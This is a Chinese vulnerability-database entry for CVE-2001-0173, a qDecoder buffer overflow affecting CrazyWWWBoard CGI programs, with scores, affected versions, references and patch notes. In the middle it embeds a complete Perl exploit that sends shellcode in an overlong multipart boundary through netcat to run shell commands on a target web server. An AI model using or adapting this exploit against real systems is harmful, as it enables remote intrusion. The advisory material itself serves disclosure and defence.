CVE-2001-0173
CVSS10.0
发布时间 :2001-05-03 00:00:00
修订时间 :2008-09-05 16:23:27
NMCOES    

[原文]Buffer overflow in qDecoder library 5.08 and earlier, as used in CrazyWWWBoard, CrazySearch, and other CGI programs, allows remote attackers to execute arbitrary commands via a long MIME Content-Type header.


[CNNVD]qDecoder library缓冲区溢出漏洞(CNNVD-200105-018)

        qDecoder library 5.08及其早期版本存在缓冲区溢出漏洞。当用于CrazyWWWBoard, CrazySearch,以及其他CGI程序中的时候,远程攻击者可以借助MIME Content-Type头执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:nobreak_technologies:crazywwwboard:2000lepx
cpe:/a:qdecoder:qdecoder:4.3
cpe:/a:qdecoder:qdecoder:5.0.3
cpe:/a:nobreak_technologies:crazywwwboard:98
cpe:/a:nobreak_technologies:crazywwwboard:2000.0lepx
cpe:/a:qdecoder:qdecoder:4.3.1
cpe:/a:qdecoder:qdecoder:4.0
cpe:/a:nobreak_technologies:crazywwwboard:98pe
cpe:/a:qdecoder:qdecoder:5.0
cpe:/a:qdecoder:qdecoder:5.0.1
cpe:/a:nobreak_technologies:crazywwwboard:2000.0px
cpe:/a:nobreak_technologies:crazywwwboard:2000px
cpe:/a:nobreak_technologies:crazywwwboard:3.0.1
cpe:/a:qdecoder:qdecoder:5.0.2
cpe:/a:qdecoder:qdecoder:4.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0173
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0173
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-018
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2329
(VENDOR_ADVISORY)  BID  2329
http://xforce.iss.net/static/6033.php
(VENDOR_ADVISORY)  XF  crazywwwboard-qdecoder-bo
http://archives.neohapsis.com/archives/bugtraq/2001-01/0486.html
(VENDOR_ADVISORY)  BUGTRAQ  20010130 Nobreak Tecnologies CrazyWWWBoard Remote Buffer Overflow

- 漏洞信息

qDecoder library缓冲区溢出漏洞
危急 缓冲区溢出
2001-05-03 00:00:00 2005-10-20 00:00:00
远程※本地  
        qDecoder library 5.08及其早期版本存在缓冲区溢出漏洞。当用于CrazyWWWBoard, CrazySearch,以及其他CGI程序中的时候,远程攻击者可以借助MIME Content-Type头执行任意命令。

- 公告与补丁

        qdecoder.diff patch was provided by "You, Jin-Ho" .
        qDecoder qDecoder 4.0
        
        qDecoder qDecoder 4.0.1
        
        qDecoder qDecoder 4.3
        
        qDecoder qDecoder 4.3.1
        
        qDecoder qDecoder 5.0
        
        qDecoder qDecoder 5.0.1
        
        qDecoder qDecoder 5.0.2
        
        qDecoder qDecoder 5.0.3
        

- 漏洞信息 (20606)

qDecoder 4.x/5.x Remote Buffer Overflow Vulnerability (EDBID:20606)
cgi remote
2000-03-26 Verified
0 Jin Ho You
N/A [点击下载]
source: http://www.securityfocus.com/bid/2329/info

Improperly validated user-supplied input to the Content-Type header can create an overflow condition.

As a result, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address, potentially allowing remote code execution with the privileges of the webserver.

#!/usr/bin/perl
# crazy.pl
#
# CrazyWWWBoard.cgi Remote Buffer Overflow Exploit for i386 Linux
#
# CGIs using qDecoder 4.0~5.0.8 are vulnerable to boundary delimeter
# over 254 characters in the header "Content-Type: multipart/form-data".
#
# nc, the netcat program is required.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 03/26/2000

$nc_path = "nc";        # path of netcat program

$usage =
"usage: crazy.pl [options] CGI-URL\n
  CGI-URL        URL of the target CGI
  -c command     Bourne shell command
                 Default: '/bin/echo 00ps, Crazy!'
  -o offset      Offset of the egg shell code,
                 Recommended [-300,+300]

example)
  crazy.pl http://target.com:8080/cgi-bin/vulnerable.cgi
  crazy.pl -o -47 target.com/cgi-bin/vulnerable.cgi
  crazy.pl -c 'echo vulnerable.cgi has a security hole! | mail root' \\
           target.com/cgi-bin/vulnerable.cgi

";

require 'getopt.pl';
Getopt('oc');

if ($#ARGV < 0) {
    print $usage;
    exit(0);
};

$cgiurl = $ARGV[0];
$command = $opt_c ? $opt_c : "/bin/echo 00ps, Crazy!";
$offset = $opt_o ? $opt_o : 0;

$cgiurl =~ s/http:\/\///;
($host, $cgiuri) = split(/\//, $cgiurl, 2);
($host, $port) = split(/:/, $host);
$port = 80 unless $port;
$command = "/bin/echo Content-Type: text/html;/bin/echo;($command)";
$cmdlen = length($command);
$argvp = int((0x0b + $cmdlen) / 4) * 4 + 4;
$shellcode =
  "\xeb\x37"                            # jmp 0x37
. "\x5e"                                # popl %esi
. "\x89\x76" . pack(C, $argvp)          # movl %esi,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x08"                        # addl $0x8,%eax
. "\x89\x46" . pack(C, $argvp + 4)      # movl %eax,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x0b"                        # addl $0xb,%eax
. "\x89\x46" . pack(C, $argvp + 8)      # movl %eax,0xb(%esi)
. "\x31\xc0"                            # xorl %eax,%eax
. "\x88\x46\x07"                        # movb %eax,0x7(%esi)
. "\x4e"                                # dec %esi
. "\x88\x46\x0b"                        # movb %eax,0xb(%esi)
. "\x46"                                # inc %esi
. "\x88\x46" . pack(C, 0x0b + $cmdlen)  # movb %eax,0xb(%esi)
. "\x89\x46" . pack(C, $argvp + 12)     # movl %eax,0xb(%esi)
. "\xb0\x0b"                            # movb $0xb,%al
. "\x89\xf3"                            # movl %esi,%ebx
. "\x8d\x4e" . pack(C, $argvp)          # leal 0xb(%esi),%ecx
. "\x8d\x56" . pack(C, $argvp + 12)     # leal 0xb(%esi),%edx
. "\xcd\x80"                            # int 0x80
. "\x31\xdb"                            # xorl %ebx,%ebx
. "\x89\xd8"                            # movl %ebx,%eax
. "\x40"                                # inc %eax
. "\xcd\x80"                            # int 0x80
. "\xe8\xc4\xff\xff\xff"                # call -0x3c
. "/bin/sh0-c0"                         # .string "/bin/sh0-c0"
. $command;
$offset -= length($command) / 2 + length($host . $port , $cgiurl);
$shelladdr = 0xbffffbd0 + $offset;
$noplen = 242 - length($shellcode);
$jump = $shelladdr + $noplen / 2;
$entries = $shelladdr + 250;
$egg = "\x90" x $noplen . $shellcode . pack(V, $jump) x 9
        . pack(V, $entries) x 2 . pack(V, $jump) x 2;

$content = substr($egg, 254) .
  "--\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n0\r\n--$egg--\r\n";
$contentlength = length($content);

printf STDERR "Jump to 0x%x\n", $jump;

open(HTTP, "|$nc_path $host $port");
select(HTTP); $|= 1;
print HTTP <<__HEADER__;
POST /$cgiuri HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.72 [ko] (X11; I; Linux 2.2.14 i686)
Host: $host:$port
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: ko
Accept-Charset: euc-kr,*,utf-8
Content-type: multipart/form-data; boundary=$egg
Content-length: $contentlength

$content
__HEADER__
close(HTTP);

		

- 漏洞信息

11866
qDecoder Library MIME Content-Type Header Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-01-30 Unknow
2001-01-30 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

qDecoder Remote Buffer Overflow Vulnerability
Input Validation Error 2329
Yes Yes
2001-01-30 12:00:00 2009-07-11 04:46:00
reported to bugtraq by "You, Jin-Ho" <jhyou@chonnam.chonnam.ac.kr> on Tue, 30 Jan 2001.

- 受影响的程序版本

qDecoder qDecoder 5.0.3
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 5.0.2
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 5.0.1
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 5.0
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.3.1
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.3
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.0.1
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 4.0
+ Nobreak Technologies CrazyWWWBoard 2000.0 px
+ Nobreak Technologies CrazyWWWBoard 2000.0 LEpx
+ Nobreak Technologies CrazyWWWBoard 3.0.1
+ Nobreak Technologies CrazyWWWBoard 98PE
+ Nobreak Technologies CrazyWWWBoard 98
+ Nobreak Technologies CrazyWWWBoard 2000px
+ Nobreak Technologies CrazyWWWBoard 2000LEpx
qDecoder qDecoder 6.0.3

- 不受影响的程序版本

qDecoder qDecoder 6.0.3

- 漏洞讨论

Improperly validated user-supplied input to the Content-Type header can create an overflow condition.

As a result, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address, potentially allowing remote code execution with the privileges of the webserver.

- 漏洞利用

crazywww.pl exploit was provided by "You, Jin-Ho" &lt;jhyou@chonnam.chonnam.ac.kr&gt;.

- 解决方案

qdecoder.diff patch was provided by "You, Jin-Ho" <jhyou@chonnam.chonnam.ac.kr>.


qDecoder qDecoder 4.0

qDecoder qDecoder 4.0.1

qDecoder qDecoder 4.3

qDecoder qDecoder 4.3.1

qDecoder qDecoder 5.0

qDecoder qDecoder 5.0.1

qDecoder qDecoder 5.0.2

qDecoder qDecoder 5.0.3

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站